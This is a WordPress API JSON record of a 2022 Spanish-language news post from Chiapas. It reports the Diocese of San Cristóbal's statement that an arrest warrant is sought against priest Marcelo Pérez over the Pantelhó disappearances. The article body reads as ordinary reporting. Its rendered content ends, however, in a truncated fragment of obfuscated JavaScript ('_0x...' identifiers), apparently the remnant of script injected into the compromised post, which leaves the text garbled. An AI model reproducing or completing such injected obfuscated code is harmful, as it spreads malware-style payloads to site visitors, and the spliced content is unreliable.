{"id":3413,"date":"2022-07-04T02:49:20","date_gmt":"2022-07-04T02:49:20","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3413"},"modified":"2022-07-04T02:49:22","modified_gmt":"2022-07-04T02:49:22","slug":"existe-solicitud-de-orden-de-aprehension-en-contra-de-marcelo-perez-diocesis-de-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3413","title":{"rendered":"Existe solicitud de orden de aprehensi\u00f3n en contra de Marcelo P\u00e9rez: Di\u00f3cesis de San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/received_602670441147118-1-1024x576.jpeg\" alt=\"\" class=\"wp-image-3414\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/received_602670441147118-1-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/received_602670441147118-1-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/received_602670441147118-1-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/received_602670441147118-1-1536x864.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/received_602670441147118-1.jpeg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- El Obispo de la Di\u00f3cesis de San Crist\u00f3bal, Rodrigo Aguilar Mart\u00ednez; Luis Manuel L\u00f3pez Alfaro, Obispo Auxiliar; Mar\u00eda Reyes Arias Sarao, Secretaria-Canciller y Jos\u00e9 Luis Bezares Selvas, Vicario de Justicia y Paz, confirmaron que hay intenciones de activar \u00f3rdenes de aprehensi\u00f3n en contra del sacerdote Marcelo P\u00e9rez P\u00e9rez, relacionados con el tema de Pantelh\u00f3, donde existen personas desaparecidos.<\/p>\n\n\n\n<p>\u201cTodo esto ha tra\u00eddo como consecuencias amenazas e intimidaciones contra los y las Agentes de Pastoral de nuestra di\u00f3cesis, en varias de las zonas arriba mencionadas. Entre las que m\u00e1s destacan son, desde hace varios a\u00f1os, las que se hacen contra nuestro agente de pastoral Presb\u00edtero Marcelo P\u00e9rez P\u00e9rez, y que en estos \u00faltimos d\u00edas han incrementado, adem\u00e1s de que existe una solicitud de orden de aprehensi\u00f3n en su contra\u201d, suscribieron.<\/p>\n\n\n\n<p>En el comunicado, hacen menci\u00f3n que en la detenci\u00f3n Pedro Cort\u00e9s L\u00f3pez (ex presidente concejal de Pantelh\u00f3) y a Diego Mendoza Cruz, de acuerdo a la palabra de quienes abogan por ellos, \u201clos testigos presenciales, expresaron que no se les present\u00f3 la orden de aprehensi\u00f3n y adem\u00e1s se hizo con lujo de violencia, por lo cual tambi\u00e9n se violentaron sus derechos\u201d.<\/p>\n\n\n\n<p>Consideran que estas situaciones mencionadas, se han dado a conocer, de diversas maneras, a las autoridades de los tres niveles de gobierno las cuales se ven rebasadas, permisivas y\/o coludidas por el sistema de control que el crimen organizado ejerce en el territorio nacional.<\/p>\n\n\n\n<p>Como Di\u00f3cesis de San Crist\u00f3bal, instan a que cese la persecuci\u00f3n, represi\u00f3n e intimidaci\u00f3n para personas que luchan por la construcci\u00f3n de un mundo diferente y mejor.<\/p>\n\n\n\n<p>\u201cNuestra Iglesia diocesana tambi\u00e9n ha sido mediadora en varios de los conflictos que se han suscitado en nuestro estado, siempre en contribuci\u00f3n a la b\u00fasqueda del di\u00e1logo y la reconciliaci\u00f3n, por la v\u00eda pac\u00edfica. Este trabajo, arduo y nada f\u00e1cil, trae muchas veces la ingratitud de alguno de los actores involucrados cuando solamente persiguen sus ambiciones ego\u00edstas y no la b\u00fasqueda del bien com\u00fan\u201d, concluyen.<\/p>\n\n\n\n<p>Es de recordar que familiares de 21 desaparecidos del municipio de Pantelh\u00f3 desde el pasado 26 de julio de 2021, han se\u00f1alado la complicidad del sacerdote Marcelo P\u00e9rez, y en diversas ocasiones han hecho se\u00f1alamientos en su contra, y es que en varias ocasiones se le vio junto al hoy preso Pedro Cort\u00e9s, se\u00f1alado por los desaparecidos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- El Obispo de la Di\u00f3cesis de San Crist\u00f3bal, Rodrigo Aguilar Mart\u00ednez; Luis Manuel L\u00f3pez Alfaro, Obispo Auxiliar; Mar\u00eda Reyes Arias Sarao, Secretaria-Canciller y Jos\u00e9 Luis Bezares Selvas, Vicario de Justicia y Paz, confirmaron que hay intenciones de activar \u00f3rdenes de aprehensi\u00f3n en contra del sacerdote Marcelo P\u00e9rez P\u00e9rez, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3414,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-3413","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3413","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3413"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3413\/revisions"}],"predecessor-version":[{"id":3415,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3413\/revisions\/3415"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3414"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3413"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3413"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3413"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}